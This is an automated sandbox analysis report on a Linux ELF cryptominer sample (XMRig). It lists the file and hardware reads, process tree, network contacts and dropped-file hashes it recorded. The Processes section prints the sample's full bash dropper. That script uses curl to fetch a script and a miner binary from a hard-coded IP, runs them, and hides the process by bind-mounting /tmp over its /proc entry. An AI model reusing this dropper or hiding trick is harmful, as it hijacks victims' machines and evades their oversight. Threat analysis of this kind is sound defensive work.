Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-b2ke1ayeqa
Target 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
SHA256 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282
Tags
xmrig antivm defense_evasion discovery miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282

Threat Level: Known bad

The file 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf was found to be: Known bad.

Malicious Activity Summary

xmrig antivm defense_evasion discovery miner

XMRig Miner payload

xmrig

Executes dropped EXE

File and Directory Permissions Modification

Checks hardware identifiers (DMI)

Enumerates running processes

Reads hardware information

Reads CPU attributes

Checks CPU configuration

Enumerates kernel/hardware configuration

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 01:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 01:38

Reported

2024-10-18 01:41

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /root/.sysemd/sysemd /root/.sysemd/sysemd N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /root/.sysemd/sysemd N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /root/.sysemd/sysemd N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /root/.sysemd/sysemd N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/possible /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/top N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/online /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type /root/.sysemd/sysemd N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/cgroup/cpuset.mems.effective /root/.sysemd/sysemd N/A
File opened for reading /sys/kernel/mm/hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu /usr/bin/top N/A
File opened for reading /sys/fs/cgroup/cgroup.controllers /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/cpu /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/online /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/virtual/dmi/id /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/meminfo /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/cpumap /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node /usr/bin/top N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency /root/.sysemd/sysemd N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /root/.sysemd/sysemd N/A
File opened for reading /sys/firmware/dmi/tables/DMI /root/.sysemd/sysemd N/A
File opened for reading /sys/fs/cgroup/cpuset.cpus.effective /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/meminfo /usr/bin/top N/A
File opened for reading /sys/bus/dax/devices /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access1/initiators /root/.sysemd/sysemd N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency /root/.sysemd/sysemd N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1077/statm /usr/bin/top N/A
File opened for reading /proc/1096/stat /usr/bin/top N/A
File opened for reading /proc/1111/stat /usr/bin/top N/A
File opened for reading /proc/1205/stat /usr/bin/top N/A
File opened for reading /proc/1209/statm /usr/bin/top N/A
File opened for reading /proc/1271/stat /usr/bin/top N/A
File opened for reading /proc/19/stat /usr/bin/top N/A
File opened for reading /proc/93/stat /usr/bin/top N/A
File opened for reading /proc/109/statm /usr/bin/top N/A
File opened for reading /proc/521/statm /usr/bin/top N/A
File opened for reading /proc/584/statm /usr/bin/top N/A
File opened for reading /proc/771/stat /usr/bin/top N/A
File opened for reading /proc/967/stat /usr/bin/top N/A
File opened for reading /proc/979/stat /usr/bin/top N/A
File opened for reading /proc/25/statm /usr/bin/top N/A
File opened for reading /proc/94/stat /usr/bin/top N/A
File opened for reading /proc/1197/stat /usr/bin/top N/A
File opened for reading /proc/1030/statm /usr/bin/top N/A
File opened for reading /proc/1311/statm /usr/bin/top N/A
File opened for reading /proc/1326/statm /usr/bin/top N/A
File opened for reading /proc/95/stat /usr/bin/top N/A
File opened for reading /proc/590/stat /usr/bin/top N/A
File opened for reading /proc/404/statm /usr/bin/top N/A
File opened for reading /proc/1160/statm /usr/bin/top N/A
File opened for reading /proc/1180/statm /usr/bin/top N/A
File opened for reading /proc/1398/stat /usr/bin/top N/A
File opened for reading /proc/76/stat /usr/bin/top N/A
File opened for reading /proc/89/statm /usr/bin/top N/A
File opened for reading /proc/85/stat /usr/bin/top N/A
File opened for reading /proc/215/statm /usr/bin/top N/A
File opened for reading /proc/307/stat /usr/bin/top N/A
File opened for reading /proc/412/statm /usr/bin/top N/A
File opened for reading /proc/629/stat /usr/bin/top N/A
File opened for reading /proc/1632/stat /usr/bin/top N/A
File opened for reading /proc/self/auxv /usr/bin/top N/A
File opened for reading /proc/27/stat /usr/bin/top N/A
File opened for reading /proc/85/statm /usr/bin/top N/A
File opened for reading /proc/93/statm /usr/bin/top N/A
File opened for reading /proc/664/stat /usr/bin/top N/A
File opened for reading /proc/1041/stat /usr/bin/top N/A
File opened for reading /proc/1398/statm /usr/bin/top N/A
File opened for reading /proc/1426/statm /usr/bin/top N/A
File opened for reading /proc/self/stat /usr/bin/top N/A
File opened for reading /proc/8/statm /usr/bin/top N/A
File opened for reading /proc/1640/statm /usr/bin/top N/A
File opened for reading /proc/112/stat /usr/bin/top N/A
File opened for reading /proc/588/stat /usr/bin/top N/A
File opened for reading /proc/633/stat /usr/bin/top N/A
File opened for reading /proc/839/statm /usr/bin/top N/A
File opened for reading /proc/1055/stat /usr/bin/top N/A
File opened for reading /proc/1118/statm /usr/bin/top N/A
File opened for reading /proc/17/stat /usr/bin/top N/A
File opened for reading /proc/81/statm /usr/bin/top N/A
File opened for reading /proc/1590/statm /usr/bin/top N/A
File opened for reading /proc/1641/statm /usr/bin/top N/A
File opened for reading /proc/1155/statm /usr/bin/top N/A
File opened for reading /proc/1188/stat /usr/bin/top N/A
File opened for reading /proc/1077/stat /usr/bin/top N/A
File opened for reading /proc/1281/statm /usr/bin/top N/A
File opened for reading /proc/216/stat /usr/bin/top N/A
File opened for reading /proc/628/statm /usr/bin/top N/A
File opened for reading /proc/109/stat /usr/bin/top N/A
File opened for reading /proc/113/statm /usr/bin/top N/A
File opened for reading /proc/958/stat /usr/bin/top N/A

Processes

/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/bin/bash

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c exec '/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf' "$@" /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/bin/bash

[/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c #!/bin/bash cpu_num=`grep -c "model name" /proc/cpuinfo` cpu_used=`expr $cpu_num / 2` #echo $s dir=$(pwd) if [ `whoami` = "root" ];then cd ~ && mkdir .sysemd >/dev/null 2>&1 cd .sysemd >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 n=$(cat .num) kill -9 $n >/dev/null 2>&1 curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh && chmod +x go.sh sleep 1 sed -i "3s/20/${cpu_used}/" go.sh curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd && chmod +x sysemd sleep 1 sh go.sh sleep 3 pid=$(top -b -n1 | grep sysemd | head -1 | awk '{print $1}') echo $pid > .num mount -o bind /tmp /proc/$pid >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 fi /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf]

/usr/bin/grep

[grep -c model name /proc/cpuinfo]

/usr/bin/expr

[expr 1 / 2]

/usr/bin/whoami

[whoami]

/usr/bin/mkdir

[mkdir .sysemd]

/usr/bin/rm

[rm -f go.sh sysemd]

/usr/bin/cat

[cat .num]

/usr/bin/curl

[curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh]

/usr/bin/chmod

[chmod +x go.sh]

/usr/bin/sleep

[sleep 1]

/usr/bin/sed

[sed -i 3s/20/0/ go.sh]

/usr/bin/curl

[curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd]

/usr/bin/chmod

[chmod +x sysemd]

/usr/bin/sleep

[sleep 1]

/usr/bin/sh

[sh go.sh]

/root/.sysemd/sysemd

[./sysemd -o 104.168.101.23:34512 -t 0 -p xm3 --randomx-1gb-pages -k -B]

/usr/bin/sleep

[sleep 3]

/usr/bin/grep

[grep sysemd]

/usr/bin/top

[top -b -n1]

/usr/bin/head

[head -1]

/usr/bin/awk

[awk {print $1}]

/usr/bin/mount

[mount -o bind /tmp /proc/1632]

/usr/bin/rm

[rm -f go.sh sysemd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 104.168.101.23:1234 104.168.101.23 tcp
US 104.168.101.23:1234 104.168.101.23 tcp
US 104.168.101.23:34512 tcp

Files

/root/.sysemd/go.sh

MD5 496b34eb065a5f2a4b2455f207d890b2
SHA1 dc170fb3d571ef0b238e33fcae8c2bc50e1e4fd1
SHA256 728055874a80558d3900fded78c97584d4728e1bd9124db9d20b8953edacb8c4
SHA512 f9774855d64f46b232f93601430db18bd470067372a09c3933d19ca19658eb21d9c6d4f4d1ef49a7e1d0526e6f67d40d9e33e54c8f0867050c0d348635b19e47

/root/.sysemd/sedK5Ug6t

MD5 6bcf2d2ea1ceb1766c5bfbf8728a57e3
SHA1 e542eee55d92c4f5e3fbb86c244edf04afdfee22
SHA256 53bff9f21bdaa669c662f3d9c3a4d7f236e063f75ce418874d55674ea6125796
SHA512 00d0dd6643a22d7e63a559a5dd7f48cd61f26a5c214e308fbd3dcb6a1238d553f89f7af51a92465004b117b9cd08c1df2c2e46875f5a8f61ed467dc87cd9b598

/root/.sysemd/sysemd

MD5 8f633ade35df4f992eb28a2c5bc37cef
SHA1 6b2fe529339896b22328dec8936219e7b8e3252f
SHA256 364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c
SHA512 8073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73

/root/.sysemd/.num

MD5 679359fe74d809a6564f60e75585ed3b
SHA1 7f114e9dc091154c365576d4702a63392f88704e
SHA256 d05dd95f7ec068988015cb6c4536510191eaba0ebbd7a6c9feb55c73650cc698
SHA512 9b493b0a9a67bcb95df947fc628ab7366ed6f5136267782dc0c967063244b5e4acacc32a22242b8fc506f22cdfe91eb802165e4c7d12e07de79563453f3e05a7